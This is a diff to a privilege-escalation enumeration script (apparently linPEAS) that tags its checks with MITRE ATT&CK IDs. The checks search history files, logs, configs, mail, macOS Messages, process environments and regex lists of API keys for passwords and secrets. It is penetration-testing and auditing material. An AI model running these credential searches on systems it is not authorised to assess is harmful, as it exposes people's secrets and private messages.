do find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; done @@ -8089,14 +10705,20 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1082"; then if [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files datetimes inside the firmware (limit 50)" + print_2title "Files datetimes inside the firmware (limit 50)" "T1082" find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" echo "" fi -print_2title "Executable files potentially added by user (limit 70)" +fi + +if check_mitre_filter "T1083"; then +print_2title "Executable files potentially added by user (limit 70)" "T1083" if ! [ "$SEARCH_IN_FOLDER" ]; then find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 else @@ -8104,21 +10726,30 @@ else fi echo "" +fi + +if check_mitre_filter "T1204.002"; then if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" + print_2title "Unsigned Applications" "T1204.002" macosNotSigned /System/Applications fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$(ls /opt 2>/dev/null)" ]; then - print_2title "Unexpected in /opt (usually empty)" + print_2title "Unexpected in /opt (usually empty)" "T1083" ls -la /opt echo "" fi fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Unexpected in root" + print_2title "Unexpected in root" "T1083" if [ "$MACPEAS" ]; then (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found else @@ -8127,12 +10758,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi -print_2title "Modified interesting files in the last 5mins (limit 100)" +fi + +if check_mitre_filter "T1083"; then +print_2title "Modified interesting files in the last 5mins (limit 100)" "T1083" find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" +fi + +if check_mitre_filter "T1070.002"; then if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below -print_2title "Writable log files (logrotten) (limit 50)" +print_2title "Writable log files (logrotten) (limit 50)" "T1070.002" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" @@ -8148,7 +10785,7 @@ print_2title "Writable log files (logrotten) (limit 50)" done fi # Check syslog configuration -print_2title "Syslog configuration (limit 50)" +print_2title "Syslog configuration (limit 50)" "T1070.002" if [ -f "/etc/rsyslog.conf" ]; then grep -v "^#" /etc/rsyslog.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50 elif [ -f "/etc/syslog.conf" ]; then @@ -8157,44 +10794,59 @@ else echo_not_found "syslog configuration" fi # Check auditd configuration -print_2title "Auditd configuration (limit 50)" +print_2title "Auditd configuration (limit 50)" "T1070.002" if [ -f "/etc/audit/auditd.conf" ]; then grep -v "^#" /etc/audit/auditd.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50 else echo_not_found "auditd configuration" fi # Check for log files with weak permissions -print_2title "Log files with potentially weak perms (limit 50)" +print_2title "Log files with potentially weak perms (limit 50)" "T1070.002" find /var/log -type f -ls 2>/dev/null | grep -Ev "root\s+root|root\s+systemd-journal|root\s+syslog|root\s+utmp" | sed -${E} "s,.*,${SED_RED},g" | head -n 50 echo "" +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files inside $HOME (limit 20)" + print_2title "Files inside $HOME (limit 20)" "T1083" (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files inside others home (limit 20)" + print_2title "Files inside others home (limit 20)" "T1552.001" (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1114.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching installed mail applications" + print_2title "Searching installed mail applications" "T1114.001" ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq echo "" fi +fi + +if check_mitre_filter "T1114.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Mails (limit 50)" + print_2title "Mails (limit 50)" "T1114.001" (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$PSTORAGE_BACKUPS" ] || [ "$DEBUG" ]; then - print_2title "Backup folders" + print_2title "Backup folders" "T1552.001" printf "%s\n" "$PSTORAGE_BACKUPS" | while read b ; do ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; ls -l "$b" 2>/dev/null && echo "" @@ -8203,7 +10855,10 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi -print_2title "Backup files (limited 100)" +fi + +if check_mitre_filter "T1552.001"; then +print_2title "Backup files (limited 100)" "T1552.001" backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) printf "%s\n" "$backs" | head -n 100 | while read b ; do if [ -r "$b" ]; then @@ -8212,14 +10867,17 @@ printf "%s\n" "$backs" | head -n 100 | while read b ; do done echo "" +fi + +if check_mitre_filter "T1005"; then if [ "$MACPEAS" ]; then - print_2title "Reading messages database" + print_2title "Reading messages database" "T1005" sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null fi if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" "T1005" FILECMD="$(command -v file 2>/dev/null || echo -n '')" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [ "$FILECMD" ]; then @@ -8268,17 +10926,23 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then fi echo "" if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" + print_2title "Downloaded Files" "T1005" sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" fi +fi + +if check_mitre_filter "T1005"; then if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" + print_2title "Downloaded Files" "T1005" sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" fi +fi + +if check_mitre_filter "T1005"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Web files?(output limit)" + print_2title "Web files?(output limit)" "T1005" ls -alhR /var/www/ 2>/dev/null | head ls -alhR /srv/www/htdocs/ 2>/dev/null | head ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head @@ -8286,70 +10950,103 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi -print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +fi + +if check_mitre_filter "T1564.001"; then +print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" "T1564.001" find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70 echo "" +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" "T1552.001" filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70) printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history cmd" + print_2title "Searching passwords in history cmd" "T1552.001" history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history files" + print_2title "Searching passwords in history files" "T1552.001" printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -EiH "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in config PHP files" + print_2title "Searching passwords in config PHP files" "T1552.001" printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiIH "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching *password* or *credential* files in home (limit 70)" + print_2title "Searching *password* or *credential* files in home (limit 70)" "T1552.001" (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Checking for TTY (sudo/su) passwords in audit logs" + print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1552.001" aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" echo "" fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Checking for TTY (sudo/su) passwords in audit logs" + print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1083" aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" echo "" fi +fi + +if check_mitre_filter "T1114.001"; then if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then - print_2title "Searching emails inside logs (limit 70)" + print_2title "Searching emails inside logs (limit 70)" "T1114.001" (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching passwords inside logs (limit 70)" + print_2title "Searching passwords inside logs (limit 70)" "T1552.001" (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -H -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords - print_2title "Searching possible password variables inside key folders (limit 140)" + print_2title "Searching possible password variables inside key folders (limit 140)" "T1552.001" if ! [ "$SEARCH_IN_FOLDER" ]; then timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & @@ -8359,7 +11056,7 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then wait echo "" ##-- IF) Find possible conf files with passwords - print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" + print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" "T1552.001" if ! [ "$SEARCH_IN_FOLDER" ]; then ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null) else @@ -8374,8 +11071,11 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.007,T1082"; then if [ -z "$MACPEAS" ]; then - print_2title "Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars" + print_2title "Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars" "T1552.007,T1082" cat /proc/[0-9]*/environ 2>/dev/null | \ tr '\0' '\n' | \ grep -Eiv "$NoEnvVars" | \ @@ -8383,6 +11083,9 @@ if [ -z "$MACPEAS" ]; then sed -${E} "s,$EnvVarsRed,${SED_RED},g" fi +fi + +fi fi echo '' @@ -8390,18 +11093,20 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q api_keys_regex; then +if check_mitre_filter "T1552.001,T1528"; then print_title "API Keys Regex" +if check_mitre_filter "T1552.001,T1528"; then if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then print_2title "Searching Hashed Passwords" - search_for_regex "Apr1 MD5" "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" - search_for_regex "Apache SHA" "\{SHA\}[0-9a-zA-Z/_=]{10,}" - search_for_regex "Blowfish" "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" - search_for_regex "Drupal" "\$S\$[a-zA-Z0-9_/\.]{52}" + search_for_regex "Apr1 MD5" "\\$apr1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" + search_for_regex "Apache SHA" "\\{SHA\\}[0-9a-zA-Z/_=]{10,}" + search_for_regex "Blowfish" "\\$2[abxyz]?\\$[0-9]{2}\\$[a-zA-Z0-9_/\\.]*" + search_for_regex "Drupal" "\\$S\\$[a-zA-Z0-9_/\\.]{52}" search_for_regex "Joomlavbulletin" "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" - search_for_regex "Linux MD5" "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" - search_for_regex "phpbb3" "\$H\$[a-zA-Z0-9_/\.]{31}" - search_for_regex "sha512crypt" "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" - search_for_regex "Wordpress" "\$P\$[a-zA-Z0-9_/\.]{31}" + search_for_regex "Linux MD5" "\\$1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" + search_for_regex "phpbb3" "\\$H\\$[a-zA-Z0-9_/\\.]{31}" + search_for_regex "sha512crypt" "\\$6\\$[a-zA-Z0-9_/\\.]{16}\\$[a-zA-Z0-9_/\\.]{86}" + search_for_regex "Wordpress" "\\$P\\$[a-zA-Z0-9_/\\.]{31}" echo '' print_2title "Searching Raw Hashes" @@ -8409,161 +11114,161 @@ if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then echo '' print_2title "Searching APIs" - search_for_regex "Adobe Client Id (Oauth Web)" "(adobe[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1 + search_for_regex "Adobe Client Id (Oauth Web)" "(adobe[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1 search_for_regex "Abode Client Secret" "(p8e-)[a-z0-9]{32}" 1 search_for_regex "Age Secret Key" "AGE-SECRET-KEY-1[QPZRY9X8GF2TVDW0S3JN54KHCE6MUA7L]{58}" search_for_regex "Airtable API Key" "[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']\"" - search_for_regex "Alchemi API Key" "(alchemi[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1 + search_for_regex "Alchemi API Key" "(alchemi[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1 search_for_regex "Alibaba Access Key ID" "(LTAI)[a-z0-9]{20}" 1 - search_for_regex "Alibaba Secret Key" "(alibaba[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1 + search_for_regex "Alibaba Secret Key" "(alibaba[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1 search_for_regex "Artifactory API Key & Password" "[\"']AKC[a-zA-Z0-9]{10,}[\"']|[\"']AP[0-9ABCDEF][a-zA-Z0-9]{8,}[\"']" - search_for_regex "Asana Client ID" "((asana[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 - search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1 + search_for_regex "Asana Client ID" "((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 + search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1 search_for_regex "AWS Client ID" "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - search_for_regex "AWS MWS Key" "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" + search_for_regex "AWS MWS Key" "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\\/+]{40}['\"]" search_for_regex "AWS AppSync GraphQL Key" "da2-[a-z0-9]{26}" - search_for_regex "Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" - search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\-]{44})['\"]" 1 - search_for_regex "Binance API Key" "(binance[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1 - search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 - search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\-]{64})['\"])" 1 - search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1 - search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1 - search_for_regex "Birise API Key" "(bitrise[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\-]{86})['\"]" 1 - search_for_regex "Block API Key" "(block[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]" 1 + search_for_regex "Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+" + search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\\-]{44})['\"]" 1 + search_for_regex "Binance API Key" "(binance[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1 + search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 + search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\\-]{64})['\"])" 1 + search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1 + search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1 + search_for_regex "Birise API Key" "(bitrise[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\\-]{86})['\"]" 1 + search_for_regex "Block API Key" "(block[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]" 1 search_for_regex "Blockchain API Key" "mainnet[a-zA-Z0-9]{32}|testnet[a-zA-Z0-9]{32}|ipfs[a-zA-Z0-9]{32}" - search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]" 1 - search_for_regex "Box API Key" "(box[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 - search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1 + search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]" 1 + search_for_regex "Box API Key" "(box[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 + search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1 search_for_regex "Clearbit API Key" "sk_[a-z0-9]{32}" search_for_regex "Clojars API Key" "(CLOJARS_)[a-zA-Z0-9]{60}" search_for_regex "Cloudinary Basic Auth" "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" - search_for_regex "Coinlayer API Key" "(coinlayer[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 - 